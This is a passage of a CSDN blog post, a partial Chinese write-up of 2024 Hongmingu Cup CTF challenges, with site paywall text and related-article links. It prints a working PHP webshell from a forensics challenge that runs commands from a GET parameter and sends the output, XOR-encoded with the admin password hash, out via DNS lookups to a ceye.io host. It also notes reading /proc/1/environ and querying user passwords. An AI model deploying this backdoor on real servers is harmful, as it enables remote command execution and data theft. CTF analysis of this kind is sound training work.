2024红明谷杯部分WP_netpixeljihad

最新推荐文章于 2024-07-29 17:17:32 发布
最新推荐文章于 2024-07-29 17:17:32 发布
阅读量464 收藏 19
点赞数 23
分类专栏: 2024年程序员学习 文章标签: 数据库 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83974064/article/details/137639450
版权

然后打包default_v3default_v3.zip,到后台风格管理处上传zip文件并启用主题。

Snipaste_2023-04-19_15-54-15.png
此时再去访问模版管理即可从根目录访问所有文件
image.png
跟之前一样,访问/proc/1/environ,即可找到flag
Snipaste_2023-04-19_15-53-38.png

0x03 hacker

<?php $servername="127.0.0.1";
$username="root";
$password="123456";
$dbname="zentao";
$conn=new PDO("mysql:host=$servername;dbname=$dbname",$username,$password);
$conn->setAttribute(PDO::ATTR\_ERRMODE,PDO::ERRMODE\_EXCEPTION);
$stmt=$conn->prepare("SELECT password FROM zt\_user WHERE account=\'admin\'");
$stmt->execute();
$result=$stmt->fetch(PDO::FETCH\_ASSOC);
$conn=null;
$param=$\_GET["cmd"];
$password=$result["password"];
$output=shell\_exec($param);
$hex\_output=bin2hex($output);
$hex\_password=bin2hex($password);
$len\_output=strlen($hex\_output);
$len\_password=strlen($hex\_password);
$max\_subdomain\_length=62;
$subdomain\_base="yafgcy.ceye.io";
$hex\_xor="";
for ($i=0;$i<$len\_output;$i++) {
	$char\_output=$hex\_output[$i];
	$char\_password=$hex\_password[$i%$len\_password];
	$char\_xor=dechex(hexdec($char\_output)^hexdec($char\_password));
	if(strlen($hex\_xor.$char\_xor)>$max\_subdomain\_length) {
		if(strlen($hex\_xor)%2!=0) {
			$subdomain="0"."$hex\_xor.$subdomain\_base";
		} else {
			$subdomain="$hex\_xor.$subdomain\_base";
		}
		gethostbyname($subdomain);
		$hex\_xor="";
	} else {
		$hex\_xor.=$char\_xor;
	}
}
if(strlen($hex\_xor)%2!=0) {
	$subdomain="0"."$hex\_xor.$subdomain\_base";
} else {
	$subdomain="$hex\_xor.$subdomain\_base";
}
gethostbyname($subdomain);
?>

可以看到执行命令的被外带了,响应包并不会有回显
image.png
注入查询出来的数据库数据,里面有admin的密码
image.png

<xmp class='a-left'>select account,password from zt_user</xmp>{"status":"success","data":"[{\"account\":\"admin\",\"
最低0.47元/天 解锁文章
2401_83974064
关注
  • 23
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023红明谷杯部分WP_netpixeljihad网络安全高频面试题+解析
2401_84006732的博客
04-03 677
解密结果:api.phpdatafavcon.icoindex.phprobots.txtsecret.txtthemexhpxxx1.phpflag经过DNS Cipher处理:https://github.com/karma9874/DNA-Cipher-Script-CTF替换几位会发现flag格式是uuid形式的,按照以下这个规则替换即可‘AAA’:‘a’‘AAC’:‘b’‘AAG’:‘c’‘AAT’:‘d’‘ACA’:‘e’
2024红明谷杯部分WP_netpixeljihad(1)
2401_83974064的博客
04-11 806
考虑一下使用后台设置栏目存在任意文件读取漏洞看看能不能读取flag点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。点击保存,访问前台,重新访问对应的顶级栏目,得到flag。
2023红明谷杯部分WP_netpixeljihad
2401_84302369的博客
05-16 612
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
2023红明谷杯部分WP
就这样吧
04-21 1191
2023红明谷杯部分WP
2023红明谷杯部分WP_netpixeljihad(1),腾讯T4架构师
2401_83740129的博客
04-17 356
去除重复的,总共有八段数据,一开始测试的时候发现除了第一条和第四条能成功解密,其他都是乱码,经过摸索才发现每条需要按照[0:] [1:] [2:] [4:]截断,其中[1:]的还得去掉最后一位,才能正确解密,而且解密出来的明文在开头还会丢失一两位字符。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。有了加密逻辑以及密码,就可以解密数据了,外带的数据也被wireshark截获了。点击保存,访问前台,重新访问对应的顶级栏目,得到flag。
2023红明谷杯部分WP_netpixeljihad网络安全社招面试题
碧海朝天素
04-05 367
点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。点击保存,访问前台,重新访问对应的顶级栏目,得到flag。
2023红明谷杯部分WP_netpixeljihad2024年BATJ30套大厂网络安全经典高频面试题
04-07 370
拿到题感觉有点儿懵先下发靶机看一眼梦想家CMS,好嘛,我直接一手查找官网直接一手演示中心碰运气哎嘿嘿,运气不错进去了,突然想起之前有位大佬写的关于Dreamer CMS的代码审计文章了想想题目一开始给的提示,flag在根目录下/flag考虑一下使用后台设置栏目存在任意文件读取漏洞看看能不能读取flag点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。点击保存,访问前台,重新访问对应的顶级栏目,得到flag。
2023第三届”红明谷“杯网络安全大赛 Writeup By AheadSec
末初的CSDN博客
04-19 3768
2023第三届”红明谷“杯网络安全大赛 Writeup By AheadSec
大数据-算法-朝鲜数学的儒学化倾向.pdf
04-18
作者崔锡鼎,字明谷,号锡鼎,是李朝肃宗时期的大臣,著有《经世正韵图说》和《明谷集》,并编纂了《左氏辑选》。这一部分还简要介绍了崔锡鼎所处时代的党派冲突,并参考了《李朝实录》中关于他的相关记载。 第二...
数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 323
数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 307
用户执行,因为环境变量配置在。
已经10岁的K8S,在很多方面仍需努力
u012516914的专栏
07-28 255
/ K8S 已经 10 岁了,但仍然有许多方面要继续努力 /Kubernetes 于 2014 年 6 月推出,自那时起,它在推广云原生应用设计和支持更多微服务部署方面发挥了巨大作用。容器部署的增长非常迅速,而 Kubernetes 对于企业管理这些部署至关重要——根据 CNCF 上一份报告的调查结果,84% 的组织正在使用或评估 Kubernetes,而 66% 的潜在和实际消费者在生产中使用 ...
SQL基础入门:解锁数据库管理的钥匙
WayneYalejk的博客
07-26 472
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
CTF-NSSCTF题单[GKCTF2020]
2302_78903258的博客
07-24 1282
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。访问/eval的路由,会设置一个delay,和你传入的get参数的delay进行比较,取较大的那个,然后setTimeout是延时函数,delay秒后就会执行第一个参数,即next(),否则就会send出timeout。是假的,但是有线索,提示说真正的flag的在。
通过Docker安装KingbaseES V8并激活开发License
weimeilayer的博客
07-24 190
首先,我们可以去KingbaseES的官网(https://www.kingbase.com.cn/xzzx/index.htm ,在软件版本中,注意下载的镜像为x86版本)下载docker镜像,下载完成后导入即可。简单介绍一下在Docker中安装人大金仓(KingbaseES V9)的过程,以及如何更换默认的License为官方提供的365天有效期的开发License。下面的安装过程都是在WSL2中完成的。我们可以通过下面的命令从宿主来直接查看KingbaseES的版本。启动容器,可以直接下面的脚本。
添加索引导致微服务异常
最新发布
07-29 495
执行DDL时,最好使用ONLINE选项,随着oracle版本升级,online状态下可执行的DDL逐步增加,大部分普通DDL上,可以使用ONLINE选项,例如。而在新增索引的时候会有TM锁,而该表又有大量的insert、update等,因此会对这些dml语句造成阻塞。1、对大表新增索引尽量停业务,就算加上online不会造成阻塞,但对性能也有影响,特别是这种性能敏感的系统。2、在新增索引的时候加online参数,而online产生的TM锁时间比较短。加了online后,可以以非独占的方式创建和删除索引。
教务管理平台/高校教务管理系统的设计与实现/教务网站/学生成绩管理系统/学生课程管理系统
weixin_47958760的博客
07-27 791
本毕业设计的内容是设计并且实现一个基于JSP技术的教务管理平台。采用MYSQL为数据库开发平台,SSM框架,Tomcat网络信息服务作为应用服务器。教务管理平台的功能已基本实现,主要有学生、教师、课程信息、课程选择、教师课表、学生成绩、图书信息、考试等管理功能。 论文主要从系统的分析与设计 、数据库设计和系统的详细设计等几个方面来进行论述,系统分析与设计部分主要论述了系统的功能分析、系统的设计思路,数据库设计主要论述了数据库的设计,系统的详细设计部分主要论述了几个主要模块的详细设计过程。
【MySQL进阶之路 | 高级篇】简述Bin Log日志
2301_80912559的博客
07-27 878
binlog即binary log,二进制日志文件,也叫作变更日志(update log)。二进制日志可以通过数据库的全量备份和二进制日志中保存的增量信息,完成数据库的无损失恢复I但是,如果遇到数据量大、数据库和数据表很多(比如分库分表的应用)的场景,用二进制日志进行数据恢复,是很有挑战性的,因为起止位置不容易管理。在这种情况下,一个有效的解决办法是配置主从数据库服务器,甚至是一主多从的架构,把二进制日志文件的内容通过中继日志,同步到从数据库服务器中,这样就可以有效避免数据库故障导致的数据异常等问题。
改进向量搜索-使用PostgresML和LlamaIndex重新排名
大数据杂货铺的博客
07-26 293
但是,它对于重新排序我们数据集的子集非常有效,因为它擅长评估新的、未见过的数据,而无需大量用户交互数据进行微调。在这里,我们将检索器配置为返回排名前两个的文档,但这次,我们添加了一个重新排名参数以使用mixedbread-ai/mxbai-rerank-base-v1模型。这意味着我们的初始语义搜索将返回 100 个结果,然后由mixedbread-ai/mxbai-rerank-base-v1模型对这些结果进行重新排名,并且仅显示排名前两个的结果。设置您的帐户,并将上述示例与您自己的数据一起使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值